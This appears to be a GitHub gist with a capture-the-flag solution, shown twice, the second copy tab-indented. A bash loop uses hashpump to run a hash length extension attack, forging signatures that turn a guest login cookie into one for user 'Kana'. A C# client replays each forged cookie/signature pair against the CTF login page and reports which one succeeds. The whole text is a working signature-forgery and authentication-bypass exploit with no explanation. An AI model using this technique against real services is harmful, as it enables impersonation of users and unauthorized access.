key-moon/ExpandAttack.sh Secret

## ExpandAttack.sh
for i in `seq 1 100`
do
hashpump -s a0750196b7aa295dba2811b19107f65c -d "logged_in=1%26id%3dguest" -k $i -a "&id=Kana"
done

## login.cs
class P
{
    static WebClient client = new WebClient();
    static void Main()
    {

        WebClient client = new WebClient();
        client.CachePolicy = new System.Net.Cache.RequestCachePolicy(System.Net.Cache.RequestCacheLevel.NoCacheNoStore);
        client.Headers = new WebHeaderCollection();
        //SendReq("logged_in=1&id=guest", "a0750196b7aa295dba2811b19107f65c");
        //return;
        using (StreamReader reader = new StreamReader("data-signature.txt"))
        {
            while (!reader.EndOfStream)
            {
                string sig = reader.ReadLine();
                string dataCookie = reader.ReadLine();
                SendReq(DecodeStr(dataCookie), sig);
            }
        }
    }
    static void SendReq(string dataCookie,string signature)
    {
        client.Headers.Clear();
        var cookie = $"Cookie:DataCookie={dataCookie}; Signature={signature}";
        Debug.WriteLine(cookie);
        client.Headers.Add(cookie);
        var s = Encoding.UTF8.GetString(client.DownloadData("http://signature.cyberrebeat.adctf.online/login.php"));
        if (s.Contains("Login failed : invalid signature!")) Console.WriteLine("fail");
        else Console.WriteLine($"success : {s}");
    }
    static string DecodeStr(string s)
    {
        string res = "";
        for (int i = 0; i < s.Length; i++)
        {
            if(s[i] != '\\')
            {
                res += s[i];
                continue;
            }
            res += $"%{s.Substring(i + 2, 2)}";
            i += 3;
        }
        res = res.Replace("%", "%25");
        return res;
    }
}
	for i in `seq 1 100`
	do
	hashpump -s a0750196b7aa295dba2811b19107f65c -d "logged_in=1%26id%3dguest" -k $i -a "&id=Kana"
	done
	class P
	{
	static WebClient client = new WebClient();
	static void Main()
	{

	WebClient client = new WebClient();
	client.CachePolicy = new System.Net.Cache.RequestCachePolicy(System.Net.Cache.RequestCacheLevel.NoCacheNoStore);
	client.Headers = new WebHeaderCollection();
	//SendReq("logged_in=1&id=guest", "a0750196b7aa295dba2811b19107f65c");
	//return;
	using (StreamReader reader = new StreamReader("data-signature.txt"))
	{
	while (!reader.EndOfStream)
	{
	string sig = reader.ReadLine();
	string dataCookie = reader.ReadLine();
	SendReq(DecodeStr(dataCookie), sig);
	}
	}
	}
	static void SendReq(string dataCookie,string signature)
	{
	client.Headers.Clear();
	var cookie = $"Cookie:DataCookie={dataCookie}; Signature={signature}";
	Debug.WriteLine(cookie);
	client.Headers.Add(cookie);
	var s = Encoding.UTF8.GetString(client.DownloadData("http://signature.cyberrebeat.adctf.online/login.php"));
	if (s.Contains("Login failed : invalid signature!")) Console.WriteLine("fail");
	else Console.WriteLine($"success : {s}");
	}
	static string DecodeStr(string s)
	{
	string res = "";
	for (int i = 0; i < s.Length; i++)
	{
	if(s[i] != '\\')
	{
	res += s[i];
	continue;
	}
	res += $"%{s.Substring(i + 2, 2)}";
	i += 3;
	}
	res = res.Replace("%", "%25");
	return res;
	}
	}